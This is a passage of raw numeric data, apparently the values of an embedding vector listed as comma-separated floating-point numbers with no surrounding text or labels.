-0.019303476437926292, 0.032327670603990555, 0.036079276353120804, -0.004523213021457195, -0.023334458470344543, 0.004992163740098476, -0.023613832890987396, 0.003954485524445772, 0.005274864844977856, -0.010350176133215427, -0.02179124392569065, -0.040655702352523804, -0.01609731651842594, 0.0009603513171896338, 0.03176892176270485, 0.008347989059984684, -0.0032693517860025167, 0.012106247246265411, -0.002855278318747878, -0.03988409787416458, 0.01726803183555603, 0.028043922036886215, -0.007436694577336311, -0.038021598011255264, 0.004589730873703957, -0.03243409842252731, -0.01532571017742157, -0.015511960722506046, -0.022536244243383408, 0.02759159915149212, -0.022842226549983025, 0.0007520673098042607, -0.007403435651212931, 0.008540891110897064, -0.0000018253430198456044, -0.010429996997117996, -0.0012106247013434768, -0.00661852490156889, 0.027910886332392693, -0.005564217455685139, 0.0050985924899578094, -0.022789012640714645, 0.012645041570067406, 0.013104014098644257, 0.006329172290861607, -0.0005458620144054294, -0.013423300348222256, 0.023720262572169304, -0.0033192401751875877, -0.013809103518724442, 0.00022948654077481478, 0.01471374649554491, -0.011640622280538082, -0.014354550279676914, -0.021032940596342087, 0.006601895671337843, -0.013177184388041496, -0.0028802223969250917, -0.00500879343599081, 0.06923177093267441, -0.0032992849592119455, -0.017893299460411072, 0.006432275287806988, -0.005015444941818714, 0.01420821063220501, 0.028097135946154594, 0.009897854179143906, -0.005354686174541712, 0.0010326894698664546, 0.018891066312789917, 0.002895188983529806, 0.012332407757639885, 0.020687047392129898, 0.04850480705499649, -0.024545082822442055, -0.009684997610747814, -0.0074167391285300255, 0.03190195560455322, 0.015698209404945374, -0.004586405120790005, 0.011427764780819416, -0.007483256980776787, -0.022988565266132355, 0.02729892171919346, 0.021777940914034843, -0.02602177858352661, -0.00743004260584712, -0.019130529835820198, -0.006345801986753941, -0.005790377967059612, -0.024584993720054626, -0.006877944804728031, 0.006482163444161415, 0.004313681740313768, 0.006685042753815651, 0.019396601244807243, 0.017494192346930504, -0.033631421625614166, -0.009053077548742294, -0.0020188165362924337, -0.040895167738199234, 0.025569457560777664, 0.008846872486174107, -0.017640531063079834, 0.009019819088280201, -0.014141692779958248, 0.003157934406772256, -0.03703713417053223, -0.0005313112633302808, -0.014647228643298149, -0.01581794209778309, -0.015472049824893475, 0.01576472818851471, 0.004317007958889008, 0.004223882686346769, 0.0006834708037786186, 0.002489430131390691, 0.0048059141263365746, -0.002175133442506194, 0.0051717618480324745, -0.042358558624982834, 0.018704816699028015, -0.0008273156126961112, -0.031103741377592087, -0.01673588901758194, -0.027059458196163177, 0.014833478257060051, -0.022097226232290268, 0.021392136812210083, -0.017188210040330887, -0.018039638176560402, -0.016376692801713943, -0.016629459336400032, 0.015472049824893475, 0.03070463426411152, 0.007742676418274641, -0.013755889609456062, 0.009312497451901436, 0.0000780025584390387, 0.01109517551958561, 0.023853298276662827, -0.011194952763617039, 0.003615244524553418, -0.009139550849795341, 0.015445442870259285, -0.014261424541473389, -0.003056494751945138, 0.018319012597203255, -0.009818033315241337, 0.009871247224509716, -0.039192311465740204, 0.028496243059635162, -0.010024238377809525, 0.025769012048840523, 0.012438836507499218, -0.008288122713565826, 0.015378925018012524, 0.001869151252321899, 0.016962049528956413, -0.008653971366584301, -0.003774887416511774, -0.007762631867080927, 0.0006768190069124103, -0.044247668236494064, 0.015738120302557945, -0.003207822795957327, 0.012664997018873692, -0.006262654438614845, 0.003176226746290922, -0.03317909687757492, -0.016483120620250702, -0.01476696040481329, -0.010523122735321522, -0.00963178277015686, 0.02772463485598564, 0.0006078067817725241, 0.015871156007051468, 0.015312407165765762, -0.007297006901353598, 0.004942275583744049, -0.007729372940957546, 0.02836320735514164, 0.006262654438614845, 0.004902364686131477, 0.004742722027003765, 0.005607454106211662, -0.016562942415475845, -0.002895188983529806, -0.028496243059635162, 0.006794797256588936, 0.00041594437789171934, 0.023906512185931206, -0.010569685138761997, 0.031689099967479706, -0.028097135946154594, 0.0037183472886681557, 0.00447665061801672, -0.025715796276926994, 0.014873389154672623, -0.018358923494815826, -0.02360052987933159, 0.017241423949599266, 0.024837762117385864, 0.01600419171154499, -0.009551961906254292, -0.012325755320489407, 0.01970258355140686, 0.009339104406535625, 0.014101781882345676, 0.0028635929338634014, -0.024345530197024345, 0.011254818178713322, 0.014567406848073006, 0.02574240416288376, 0.002808715682476759, 0.010782541707158089, -0.021964190527796745, -0.005364663898944855, 0.012545264326035976, -0.005128525663167238, 0.002404619939625263, 0.010396738536655903, 0.0029733474366366863, 0.014899996109306812, 0.01833231747150421, -0.0013137273490428925, -0.02052740566432476, -0.027564993128180504, 0.002136885654181242, 0.02772463485598564, 0.024119369685649872, -0.020327851176261902, 0.023613832890987396, 0.009359059855341911, 0.020833387970924377, 0.0026324435602873564, -0.005417878273874521, 0.0003774887300096452, 0.02471802942454815, 0.01926356554031372, 0.02262936905026436, -0.009066381491720676, 0.007223837543278933, 0.008600756525993347, -0.018132762983441353, 0.015644995495676994, -0.0036418517120182514, -0.013955443166196346, 0.030784456059336662, 0.004746047779917717, 0.02558276057243347, -0.025463029742240906, -0.01182022038847208, -0.015432138927280903, -0.02290874347090721, 0.0018824548460543156, -0.0018442070577293634, -0.005903458222746849, 0.002993302885442972, 0.009944417513906956, 0.0024910930078476667, 0.00945883709937334, 0.017574014142155647, 0.013982050120830536, -0.04890391603112221, 0.02977338433265686, -0.019622763618826866, -0.013150576502084732, -0.0027239054907113314, -0.009784773923456669, -0.008228256367146969, -0.028496243059635162, 0.006598569918423891, 0.01193995214998722, -0.004203927703201771, -0.021977493539452553, -0.017134996131062508, 0.01070272084325552, -0.0021302339155226946, -0.013270309194922447, 0.009352408349514008, 0.005467766430228949, 0.009997631423175335, -0.0028719077818095684, 0.026247939094901085, -0.001837555319070816, -0.0051950435154139996, -0.011002050712704659, 0.03025231324136257, -0.010429996997117996, -0.011174997314810753, 0.006359105464071035, -0.001549034146592021, -0.004104150924831629, -0.014407764188945293, 0.019875530153512955, -0.003648503450676799, 0.004087521228939295, -0.012372318655252457, -0.020899904891848564, -0.017640531063079834, -0.025356600061058998, -0.015591781586408615, -0.013143924996256828, -0.00012285013508517295, 0.028682492673397064, 0.006442253012210131, 0.002619139850139618, 0.02193758450448513, -0.002225021831691265, 0.012884506024420261, -0.02373356558382511, -0.002529340796172619, -0.0025925328955054283, 0.01887776330113411, 0.004346940666437149, 0.014966513961553574, 0.0016513053560629487, -0.011467675678431988, 0.018518567085266113, -0.0021302339155226946, 0.00016099396452773362, -0.015232585370540619, -0.035786598920822144, 0.013177184388041496, -0.02427901141345501, -0.007629596162587404, 0.010429996997117996, -0.012345710769295692, -0.009857944212853909, -0.013582943007349968, 0.0057670967653393745, -0.031210171058773994, -0.02062053047120571, 0.0034689053427428007, 0.002328124362975359, -0.0038912936579436064, -0.009339104406535625, -0.00661852490156889, 0.03216802701354027, 0.031050527468323708, -0.03152945637702942, 0.000828978605568409, -0.006359105464071035, -0.006525400094687939, -0.047307487577199936, 0.010556381195783615, 0.0035420749336481094, 0.02184445783495903, 0.024797851219773293, -0.0178533885627985, -0.012139505706727505, -0.009532006457448006, 0.015339014120399952, 0.012957675382494926, -0.026394279673695564, 0.027964100241661072, -0.0162968710064888, -0.024797851219773293, -0.0023696981370449066, 0.04233195260167122, 0.03134320676326752, 0.010775890201330185, -0.017307942733168602, 0.012312452308833599, 0.03488195687532425, -0.006315868813544512, -0.012724862433969975, 0.008075266145169735, 0.011667229235172272, -0.0255428496748209, 0.004440065938979387, -0.01926356554031372, 0.01625696010887623, 0.005763771012425423, -0.006003235001116991, 0.04038963094353676, -0.004862454254180193, -0.004885735455900431, 0.00335748796351254, -0.0011125109158456326, 0.008421158418059349, -0.023706957697868347, -0.02208392322063446, -0.002028794027864933, 0.02111276239156723, -0.001597259659320116, 0.0004146971623413265, -0.016576245427131653, 0.042252130806446075, 0.03041195683181286, 0.002527677919715643, 0.014846782200038433, -0.002537655644118786, -0.030518384650349617, 0.00003978078530053608, -0.01053642574697733, -0.003196182195097208, 0.0008938334649428725, -0.008095220662653446, -0.0019389950903132558, -0.005647364538162947, -0.015339014120399952, 0.005733837839215994, 0.003648503450676799, -0.010543077252805233, 0.004060914274305105, -0.0026341064367443323, -0.027751242741942406, -0.01814606599509716, -0.0029982917476445436, -0.005617431364953518, 0.023188119754195213, 0.020979726687073708, 0.004290400538593531, -0.02807052806019783, 0.0010418356396257877, -0.00034028032678179443, -0.010449952445924282, -0.03794177621603012, -0.01160071138292551, -0.0011258143931627274, -0.014035264030098915, 0.00565734226256609, 0.034802135080099106, -0.031210171058773994, 0.021817851811647415, -0.010110711678862572, -0.013057451695203781, 0.005208346992731094, 0.02111276239156723, -0.0027089391369372606, -0.02281561866402626, 0.0016754181124269962, -0.016988655552268028, 0.006598569918423891, -0.030225707218050957, 0.006794797256588936, -0.022709190845489502, -0.0075165159069001675, 0.001039341208525002, -0.0037516062147915363, 0.020740263164043427, -0.04611016809940338, -0.03280659765005112, -0.005464440677314997, -0.02671356499195099, -0.02276240475475788, -0.0026357693132013083, -0.00917281024158001, 0.013982050120830536, -0.005737163592129946, 0.009039774537086487, 0.01488669216632843, 0.0013469862751662731, 0.013330175541341305, -0.021538477391004562, -0.00034111179411411285, 0.01371597871184349, 0.036318741738796234, 0.004928972106426954, 0.0027505126781761646, 0.0045997085981070995, 0.035839810967445374, 0.005101918242871761, 0.002128570806235075, -0.0034023874904960394, 0.0030132581014186144, 0.005404574330896139, 0.024624904617667198, -0.012206023558974266, 0.017893299460411072, -0.004057588055729866, -0.027564993128180504, -0.015485352836549282, -0.015538567677140236, 0.020008565858006477, 0.008527587167918682, -0.013982050120830536, -0.0003685504198074341, 0.012033076956868172, -0.018252495676279068, -0.013849014416337013, 0.007110757287591696, -0.0035221197176724672, 0.014820174314081669, 0.022882137447595596, -0.018957585096359253, -0.0017194862011820078, 0.01921035163104534, 0.04909016564488411, 0.0009520365856587887, 0.014673835597932339, 0.025609368458390236, -0.010077452287077904, -0.018558477982878685, -0.0037782134022563696, -0.0007325276965275407, 0.01799972727894783, 0.032567135989665985, 0.012911112979054451, -0.00953865796327591, -0.006635154597461224, -0.012605130672454834, -0.014514192938804626, -0.029108207672834396, -0.009013167582452297, -0.008627363480627537, -0.00410082470625639, -0.008494327776134014, -0.005198369268327951, 0.013170531950891018, 0.013782496564090252, -0.005221650470048189, -0.0011366235557943583, 0.00017980604025069624, -0.0024096088018268347, -0.02918802760541439, 0.016722584143280983, 0.009179461747407913, -0.004493280313909054, 0.006269306410104036, 0.004726092331111431, 0.012132854200899601, 0.0036684588994830847, 0.009944417513906956, 0.011806916445493698, 0.012558568269014359, -0.019569547846913338, 0.0057604447938501835, -0.004942275583744049, 0.007809194270521402, 0.010882318951189518, 0.007889015600085258, -0.01776026375591755, -0.0022100552450865507, 0.0023114948999136686, -0.00016359231085516512, -0.0013503121444955468, 0.01106856856495142, 0.009086336940526962, 0.0034023874904960394, -0.00931914895772934, 0.014381157234311104, -0.005537610035389662, 0.0061562261544167995, 0.028496243059635162, -0.0007208870956674218, -0.007862408645451069, -0.0034422981552779675, 0.0081484355032444, -0.0029799991752952337, -0.0011449382873252034, 0.00379484286531806, 0.009199417196214199, -0.011660577729344368, 0.02193758450448513, 0.014687138609588146, -0.0050886147655546665, -0.011354595422744751, -0.009232676587998867, -0.017095085233449936, -0.023813387379050255, 0.0008963278960436583, -0.004233860410749912, -0.01418160367757082, 0.0008747095707803965, 0.024491868913173676, -0.009498747996985912, -0.0036085927858948708, -0.009159506298601627, -0.03341856226325035, 0.001707845483906567, -0.012006470002233982, 0.0060564493760466576, -0.0008481024415232241, -0.01741437055170536, -0.006997676566243172, -0.021884368732571602, 0.005434507504105568, 0.006548681296408176, 0.013370085507631302, -0.011028657667338848, 0.020899904891848564, -0.0046163382939994335, -0.0007558089564554393, 0.0024129345547407866, -0.012944371439516544, -0.03195517137646675, 0.013310220092535019, -0.010283658280968666, -0.012312452308833599, 0.00445004366338253, 0.014647228643298149, -0.01479356735944748, 0.021684816107153893, -0.01293771993368864, 0.0053713154047727585, -0.014261424541473389, 0.01160071138292551, -0.009119595400989056, 0.004553146194666624, 0.015285799279808998, -0.014288032427430153, -0.008022051304578781, 0.0009578568860888481, -0.01150758657604456, -0.0022100552450865507, -0.005803681444376707, 0.004802587907761335, -0.003455601865425706, -0.002048749476671219, -0.013423300348222256, -0.0007786744390614331, 0.0021335596684366465, -0.00267568021081388, 0.007682810537517071, -0.04392838105559349, 0.0016355073312297463, -0.014966513961553574, -0.006229395512491465, 0.030917491763830185, 0.007549774833023548, 0.00030806075665168464, -0.01527249626815319, 0.00027895919629372656, -0.0069444626569747925, 0.0037615839391946793, -0.01293771993368864, -0.011221559718251228, 0.006415645591914654, 0.007656203582882881, -0.018704816699028015, 0.003014921210706234, -0.006009886972606182, 0.01245879102498293, -0.0005529295303858817, 0.00004838133463636041, -0.015778031200170517, 0.004749373998492956, 0.004290400538593531, -0.01863829791545868, -0.018372226506471634, 0.0007499886560253799, 0.001049318932928145, 0.002416260540485382, 0.003144630929455161, -0.011866782791912556, -0.0027937493287026882, 0.007662855088710785, 0.01897088810801506, -0.008135131560266018, 0.006422297563403845, 0.004496606066823006, 0.0036285482347011566, 0.0036318739876151085, -0.02715258300304413, 0.013037496246397495, 0.005737163592129946, 0.006698346696794033, 0.02145865559577942, -0.004287074785679579, 0.004203927703201771, -0.01420821063220501, 0.005234953947365284, 0.02145865559577942, 0.015392228029668331, 0.013150576502084732, -0.023680351674556732, -0.011441068723797798, -0.009472140111029148, -0.000628593610599637, -0.00010445379302836955, -0.014367853291332722, -0.011520889587700367, 0.017494192346930504, 0.017547406256198883, -0.014939907006919384, -0.029054991900920868, 0.001307907048612833, -0.009139550849795341, -0.03219463303685188, 0.017214816063642502, 0.012299148365855217, 0.007869060151278973, 0.002575903432443738, 0.013190487399697304, -0.007729372940957546, -0.024305619299411774, -0.013383389450609684, 0.011773657985031605, -0.03030552715063095, -0.010556381195783615, -0.00795553345233202, 0.021325619891285896, -0.004140735603868961, -0.018651602789759636, -0.0225229412317276, 0.004519887268543243, 0.002324798610061407, -0.02349410019814968, -0.00836794450879097, 0.019675977528095245, -0.005574195180088282, -0.003465579356998205, -0.00032198792905546725, 0.015698209404945374, 0.00767615856602788, -0.003798168618232012, -0.01221267506480217, 0.016469817608594894, 0.008068613708019257, 0.012245934456586838, -0.013755889609456062, -0.04491284489631653, -0.001618046429939568, -0.007469953503459692, -0.013536380603909492, 0.020301245152950287, 0.030385348945856094, 0.033791061490774155, 0.013370085507631302, -0.004576427396386862, 0.028043922036886215, 0.024890976026654243, 0.00834133755415678, 0.007802542764693499, 0.01541883498430252, 0.009818033315241337, 0.011168344877660275, -0.00951205100864172, 0.0016338444547727704, -0.006561984773725271, 0.0001442605716874823, 0.017454281449317932, -0.01415499672293663, 0.008939997293055058, 0.007942230440676212, -0.0037116955500096083, -0.002836985979229212, 0.009019819088280201, 0.012798032723367214, -0.018718119710683823, -0.004030981101095676, 0.0031745638698339462, 0.015339014120399952, 0.003788190893828869, 0.010962139815092087, -0.01838553138077259, 0.014753656461834908, 0.016070710495114326, -0.007483256980776787, 0.0008061130647547543, -0.012418881058692932, -0.011055264621973038, 0.0027388720773160458, -0.00013688123726751655, -0.014021961018443108, 0.01581794209778309, 0.00019207026343792677, -0.0004793441912624985, 0.004200601484626532, 0.02466481551527977, -0.01203972939401865, 0.002407945692539215, 0.0030648093670606613, 0.0270993672311306, -0.00743004260584712, -0.0024445306044071913, -0.003254385432228446, -0.017986424267292023, 0.022509636357426643, 0.0007362693431787193, 0.004563123919069767, 0.018305709585547447, 0.023680351674556732, -0.020993029698729515, 0.005032074637711048, 0.00469615962356329, -0.012086291797459126, 0.035706777125597, -0.004845824558287859, 0.0007358536240644753, -0.002017153427004814, -0.02519695833325386, 0.00907303299754858, -0.019622763618826866, -0.00045065837912261486, 0.005108570214360952, 0.021338922902941704, -0.012645041570067406, 0.01349646970629692, -0.00401435187086463, -0.000024853246941347606, -0.01693544164299965, 0.0007724384195171297, -0.018398834392428398, -0.00185751065146178, -0.010543077252805233, 0.0097049530595541, -0.0012946034548804164, -0.008181693963706493, 0.007010980509221554, -0.004586405120790005, 0.02684660069644451, -0.0019622761756181717, 0.007789239287376404, -0.011334639973938465, 0.020168209448456764, -0.016017496585845947, -0.015086245723068714, -0.01118830032646656, 0.003394072875380516, -0.006199462804943323, 0.00525490939617157, -0.003957811277359724, 0.00992446206510067, 0.01271821092814207, -0.009352408349514008, 0.00876039918512106, 0.00870718527585268, -0.006282609887421131, -0.0011757027823477983, 0.014314639382064342, 0.009864595718681812, 0.02354731597006321, -0.012332407757639885, 0.0037682356778532267, -0.0034323204308748245, 0.0005674803396686912, 0.008008748292922974, 0.020740263164043427, 0.009492095559835434, 0.0014933254569768906, 0.003964463248848915, 0.03703713417053223, -0.0067382571287453175, -0.02125910110771656, -0.00008153632370522246, 0.006758212577551603, -0.017001960426568985, -0.0037416284903883934, 0.0005895143840461969, 0.0358930267393589, 0.009724908508360386, -0.003724999027326703, -0.006428949069231749, 0.0036817623768001795, 0.007968837395310402, -0.003325891913846135, 0.0044267624616622925, 0.0022732471115887165, 0.006661761552095413, -0.006269306410104036, -0.0006922012544237077, -0.015778031200170517, 0.009904506616294384, 0.0074233911000192165, 0.015884460881352425, -0.010090756230056286, -0.019157137721776962, 0.008693881332874298, 0.029294457286596298, 0.02149856649339199, 0.010988746769726276, 0.004666226450353861, 0.021299012005329132, -0.006665087770670652, -0.006798123009502888, -0.0023946422152221203, 0.017826780676841736, -0.019782405346632004, -0.004433413967490196, -0.017015263438224792, -0.012645041570067406, -0.007243792992085218, -0.007376828230917454, 0.03985748812556267, 0.00161721499171108, -0.0007371008396148682, -0.02101963758468628, 0.02155178040266037, -0.01902410201728344, 0.007849104702472687, -0.0340571328997612, 0.020979726687073708, -0.02651401050388813, -0.0028802223969250917, -0.026926422491669655, 0.004050936549901962, -0.0006734931375831366, 0.024012940004467964, -0.025516243651509285, -0.023094994947314262, 0.0035620303824543953, -0.009272586554288864, -0.015086245723068714, 0.013609549961984158, 0.007010980509221554, -0.01535231713205576, -0.016562942415475845, -0.001446763053536415, 0.009086336940526962, 0.019915441051125526, -0.013190487399697304, -0.02671356499195099, -0.0008547542383894324, 0.004902364686131477, 0.018066246062517166, 0.011321336030960083, -0.005893480498343706, -0.004190623760223389, -0.00603316817432642, 0.008687229827046394, 0.00002021518776018638, -0.001238063327036798, -0.003864686470478773, -0.0029799991752952337, -0.0022616065107285976, 0.004067565780133009, 0.0034689053427428007, 0.020593922585248947, -0.023906512185931206, -0.023334458470344543, -0.008939997293055058, -0.012425532564520836, 0.00628593610599637, -0.0009337441879324615, 0.004124105907976627, -0.010582988150417805, 0.012099594809114933, 0.006588592194020748, -0.0015856190584599972, -0.01257187221199274, -0.018811244517564774, -0.016137227416038513, 0.0010451615089550614, -0.0020919861271977425, 0.0074233911000192165, 0.014660531654953957, -0.000010003659554058686, 0.004682856146246195, -0.0020188165362924337, -0.004829195328056812, 0.023507405072450638, -0.014101781882345676, 0.0018242517253383994, -0.0034822088200598955, -0.004183972254395485, -0.0040110256522893906, 0.012339059263467789, -0.01838553138077259, 0.01906401291489601, 0.022163745015859604, 0.011893389746546745, 0.0065453555434942245, 0.0002876896469388157, 0.010489863343536854, -0.0004176073125563562, -0.005773748736828566, -0.01196655910462141, 0.009132899343967438, 0.0023114948999136686, -0.00931914895772934, 0.0012372317723929882, -0.009053077548742294, -0.012857898138463497, -0.005451137199997902, 0.01179361343383789, -0.005926739424467087, -0.005773748736828566, 0.0030498430132865906, -0.0024029570631682873, 0.021671513095498085, 0.00485247652977705, -0.012791380286216736, 0.005334730725735426, -0.003515467746183276, 0.011374550871551037, 0.012478746473789215, -0.0017211490776389837, -0.017600620165467262, 0.020168209448456764, -0.0025343296583741903, 0.00982468482106924, -0.011221559718251228, 0.004566449671983719, -0.011534193530678749, -0.0007267073960974813, -0.022509636357426643, -0.006751560606062412, -0.0044034807942807674, 0.004576427396386862, -0.02572910115122795, 0.016469817608594894, 0.01168053224682808, 0.003924552351236343, -0.011880085803568363, 0.007064194418489933, 0.014820174314081669, -0.012033076956868172, 0.008108524605631828, 0.004519887268543243, -0.0014525833539664745, 0.010350176133215427, 0.004483302589505911, 0.00553428428247571, 0.000659358105622232, 0.008002095855772495, -0.010203836485743523, 0.0026490730233490467, -0.022216958925127983, 0.012019773945212364, -0.017919905483722687, -0.013596246019005775, -0.016483120620250702, -0.02008838765323162, 0.013017541728913784, 0.00008974711818154901, -0.007303658872842789, -0.004935623612254858, 0.006282609887421131, 0.03099731355905533, -0.020993029698729515, 0.006482163444161415, -0.01585785299539566, -0.0062560029327869415, -0.0010834092972800136, 0.0355205275118351, -0.012638389132916927, 0.012332407757639885, 0.0068446858786046505, 0.02175133302807808, 0.005038726143538952, 0.004995489958673716, -0.013356782495975494, -0.0194099061191082, 0.0162968710064888, 0.007543122861534357, -0.00497553450986743, -0.0065553332678973675, -0.013443255797028542, -0.01712169125676155, 0.012106247246265411, 0.004087521228939295, -0.01984892413020134, -0.019223656505346298, 0.01131468452513218, -0.0020637160632759333, 0.008933345787227154, -0.02204401232302189, 0.01567160338163376, 0.00005815114127472043, 0.0005217493162490427, -0.005431181751191616, 0.00892669428139925, 0.007742676418274641, -0.01060294359922409, -0.015099549666047096, -0.026939725503325462, 0.0022034035064280033, -0.020806780084967613, -0.005451137199997902, -0.01596428081393242, 0.019955351948738098, -0.012738166376948357, 0.014580710791051388, -0.0071440162137150764, 0.00587352504953742, 0.023946423083543777, 0.023068387061357498, -0.001579798641614616, -0.003399061504751444, 0.007682810537517071, 0.0016330130165442824, -0.0031130348797887564, -0.019423209130764008, -0.013203791342675686, 0.0008206638740375638, 0.002728894352912903, 0.011141737923026085, 0.0000551890188944526, 0.0006664256216026843, -0.01805294118821621, 0.0011915008071810007, 0.010104060173034668, -0.022536244243383408, 0.007822497747838497, 0.0064389267936348915, 0.03136981278657913, -0.0067449091002345085, -0.010077452287077904, -0.03554713353514671, -0.00139853754080832, 0.013589594513177872, 0.0055608912371098995, 0.011055264621973038, 0.022749101743102074, 0.017095085233449936, -0.00010726001346483827, -0.006542029324918985, -0.0020105016883462667, 0.026647046208381653, -0.004533190745860338, -0.007077498361468315, -0.01576472818851471, 0.018319012597203255, 0.0033292178995907307, 0.006132944952696562, -0.014035264030098915, 0.0031895304564386606, -0.0045997085981070995, 0.00261415122076869, 0.00868057832121849, 0.007070846389979124, -0.005790377967059612, 0.002017153427004814, 0.000779090216383338, -0.00575379328802228, 0.0025609368458390236, -0.0027338832151144743, 0.01741437055170536, -0.009771470911800861, 0.01620374619960785, 0.0026091623585671186, -0.026527315378189087, -0.0035786598455160856, -0.038553740829229355, 0.006322520785033703, -0.004436739720404148, 0.01819928176701069, -0.02360052987933159, -0.002506059594452381, 0.019542941823601723, -0.015458745881915092, 0.0021435373928397894, 0.0034921865444630384, -0.0007050891290418804, 0.030678028240799904, -0.011633969843387604, -0.010749283246695995, 0.006708323955535889, -0.011860131286084652, 0.02034115605056286, -0.013170531950891018, 0.0004178151721134782, 0.02281561866402626, 0.010496514849364758, 0.008061962202191353, -0.01591106690466404, 0.0050054676830768585, 0.011135086417198181, 0.0028735706582665443, -0.005614105612039566, 0.004034306854009628, 0.008361292071640491, 0.01951633393764496, -0.005032074637711048, 0.00500879343599081, 0.008221604861319065, 0.01418160367757082, 0.01265169307589531, 0.013390040956437588, 0.006086382549256086, -0.010277005843818188, -0.0042205569334328175, -0.0019722539000213146, 0.011201604269444942, 0.008959952741861343, -0.020593922585248947, -0.021152673289179802, 0.025968564674258232, 0.021432047709822655, 0.004207253456115723, -0.040283203125, -0.02699293941259384, 0.0022632693871855736, 0.002374686999246478, -0.010769238695502281, -0.004895713180303574, -0.02427901141345501, 0.013316871598362923, -0.009219372645020485, -0.015844549983739853, -0.013702674768865108, -0.01596428081393242, -0.010815801098942757, 0.022203654050827026, -0.03224784880876541, 0.018066246062517166, -0.006405667867511511, -0.012558568269014359, 0.029666956514120102, -0.004104150924831629, 0.008042006753385067, 0.018957585096359253, -0.011214908212423325, -0.008261515758931637, 0.002374686999246478, -0.001777689321897924, -0.013902228325605392, -0.005238279700279236, -0.003498838283121586, -0.0001357379660475999, -0.01761392317712307, -0.003355825087055564, -0.013689371757209301, 0.0038713382091373205, 0.017973121255636215, 0.0024312271270900965, 0.01371597871184349, -0.007290355395525694, -0.016017496585845947, -0.0025310039054602385, -0.004433413967490196, -0.010829104110598564, 0.02748517133295536, 0.012565219774842262, -0.004147387109696865, -0.007223837543278933, 0.01165392529219389, -0.001547371270135045, -0.0034888607915490866, -0.017294637858867645, -0.001458403654396534, 0.004865780007094145, 0.017454281449317932, 0.0019107249099761248, -0.000013407501683104783, -0.014194906689226627, 0.0020936490036547184, 0.0024528454523533583, 0.02491758204996586, -0.005138502921909094, 0.0049988157115876675, -0.04246499016880989, -0.0021202561911195517, -0.004669552203267813, 0.005038726143538952, 0.005291494075208902, -0.008973256684839725, 0.0059500206261873245, -0.0009711604798212647, -0.005720534361898899, -0.02477124333381653, 0.01007080078125, -0.024345530197024345, 0.017334548756480217, 0.012884506024420261, -0.010869015008211136, -0.0029118184465914965, 0.011700487695634365, -0.0076162926852703094, -0.0037516062147915363, -0.013436603359878063, -0.006329172290861607, -0.0008019556989893317, 0.01960945874452591, -0.001767711597494781, -0.00003232351446058601, -0.00693115871399641, 0.0017627227352932096, -0.02320142276585102, -0.007436694577336311, 0.006904551759362221, 0.02160499431192875, 0.022749101743102074, 0.015392228029668331, -0.009006515145301819, -0.0015332362381741405, 0.002389653353020549, -0.012232630513608456, 0.01921035163104534, -0.022097226232290268, 0.02004847675561905, 0.00848767627030611, 0.01990213803946972, 0.009019819088280201, -0.009106292389333248, 0.01761392317712307, -0.0025742403231561184, 0.011354595422744751, 0.007097453344613314, 0.01386231742799282, -0.02631445787847042, -0.038500525057315826, 0.003274340648204088, -0.017720352858304977, 0.02034115605056286, -0.0022715842351317406, 0.008840220980346203, -0.003485534805804491, 0.026740171015262604, 0.014141692779958248, 0.002745523815974593, -0.0001587074075359851, 0.00953865796327591, 0.001037678332068026, -0.008993212133646011, -0.002669028239324689, -0.001439279760234058, 0.008035355247557163, -0.005198369268327951, 0.002669028239324689, 0.014846782200038433, -0.00417066877707839, -0.02301517315208912, 0.00923932809382677, 0.014341246336698532, 0.01708178222179413, 0.014873389154672623, -0.0011125109158456326, -0.011228211224079132, 0.0027405349537730217, 0.028443029150366783, 0.028868742287158966, 0.014607317745685577, -0.011208255775272846, -0.01106856856495142, -0.026553921401500702, 0.005401248577982187, -0.011673880741000175, -0.01907731592655182, 0.019423209130764008, -0.00868057832121849, -0.0024229122791439295, -0.008434462361037731, -0.004859128035604954, -0.0005828625871799886, 0.00045065837912261486, 0.009711604565382004, 0.014115085825324059, -0.007250444497913122, 0.017600620165467262, -0.01891767419874668, 0.021086154505610466, -0.011168344877660275, 0.0018741401145234704, 0.03599945455789566, -0.004370221868157387, 0.003375780303031206, -0.00321780052036047, 0.010443300940096378, 0.0014924940187484026, 0.015312407165765762, 0.011713791638612747, 0.006708323955535889, 0.011268122121691704, 0.020753566175699234, 0.012359014712274075, -0.007489908952265978, 0.017893299460411072, -0.008893434889614582, 0.004024329129606485, -0.008387899957597256, -0.009438881650567055, -0.03128999099135399, 0.009432230144739151, -0.010350176133215427, -0.010057497769594193, 0.015831245109438896, 0.004187298007309437, -0.005238279700279236, 0.009751515462994576, -0.008022051304578781, 0.005381293129175901, 0.02296195924282074, -0.028629278764128685, 0.005261561367660761, -0.011208255775272846, -0.007895668037235737, 0.0009221035288646817, 0.003485534805804491, 0.02830999344587326, -0.0008655634010210633, 0.002487767254933715, 0.010296961292624474, 0.005673971958458424, -0.006146248430013657, -0.0016637775115668774, -0.02651401050388813, 0.0012206023093312979, -0.02091320976614952, 0.015884460881352425, 0.025063922628760338, -0.01060294359922409, -0.02107285149395466, -0.013968746177852154, 0.004114128183573484, 0.009897854179143906, 0.006492141168564558, -0.006771516054868698, -0.020314548164606094, 0.0026008475106209517, 0.013416647911071777, 0.015126156620681286, 0.008088569156825542, -0.014168299734592438, 0.004087521228939295, 0.005773748736828566, -0.006418971344828606, -0.008061962202191353, 0.02451847493648529, -0.015511960722506046, 0.007669507060199976, 0.018398834392428398, 0.01833231747150421, 0.01349646970629692, 0.009438881650567055, 0.031263384968042374, -0.00804865825921297, 0.0041274321265518665, 0.005421204026788473, 0.015884460881352425, 0.0019656021613627672, -0.017334548756480217, 0.007762631867080927, 0.016549639403820038, -0.004679529927670956, -0.000274801830528304, 0.010217140428721905, 0.0010750945657491684, -0.016084013506770134, 0.021511869505047798, 0.005444485228508711, 0.02753838524222374, 0.017055174335837364, 0.007536471355706453, 0.042305346578359604, 0.009492095559835434, 0.005178413819521666, -0.009505399502813816, -0.005793703719973564, 0.00379484286531806, 0.020939815789461136, -0.006731605622917414, -0.007563078310340643, -0.015990888699889183, -0.015378925018012524, 0.007509863935410976, 0.001318716211244464, -0.021432047709822655, 0.01386231742799282, -0.026926422491669655, -0.00653205206617713, -0.022004101425409317, -0.00890008732676506, -0.005042052362114191, 0.0016429906245321035, 0.011181648820638657, -0.04291731119155884, -0.007303658872842789, -0.024438655003905296, -0.007509863935410976, 0.016044102609157562, -0.0058502438478171825, 0.011181648820638657, 0.0033691285643726587, 0.0015864504966884851, -0.003981092944741249, -0.0012987608788534999, 0.006964417640119791, 0.0023331132251769304, -0.018319012597203255, 0.0030215729493647814, -0.0033408585004508495, 0.018864460289478302, -0.012206023558974266, 0.008939997293055058, 0.00770941749215126, 0.008560845628380775, -0.001269659260287881, -0.01960945874452591, 